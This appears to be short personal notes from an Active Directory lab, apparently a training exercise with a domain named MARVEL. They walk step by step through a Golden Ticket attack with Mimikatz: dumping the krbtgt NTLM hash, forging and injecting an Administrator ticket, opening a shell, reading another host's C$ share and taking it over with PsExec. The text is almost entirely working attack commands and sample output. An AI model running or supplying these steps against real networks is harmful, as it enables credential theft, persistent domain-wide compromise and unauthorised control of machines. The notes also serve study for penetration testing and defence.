Golden Ticket w/ Mimikatz

enable debug:

privilege::debug

lsadump::lsa /inject /name:krbtgt

what to get?:

Domain : MARVEL / S-1-5-21-1124166008-2273616456-3122094236

RID  : 000001f6 (502)
User : krbtgt

 * Primary
    NTLM : 4b1f4e81d83be29c8ae6be57a820bec8

SUID is green

TGT hash is blue

Generate golden ticket and pass it:

kerberos::golden /User:Administrator /domain:marvel.local /sid:S-1-5-21-1124166008-2273616456-3122094236 /krbtgt:4b1f4e81d83be29c8ae6be57a820bec8 /id:500 /ptt

id:500 is the admin RID. We saw earlier it said Administrator:500: that’s what this is.

Open admin cmd after getting the ticket:

misc::cmd

Can we see other PCs files?

dir \\THEPUNISHER\c$

Yes!

We can take this further!

Download PsExec.exe and take control of the machine

psexec.exe \\THEPUNISHER cmd.exe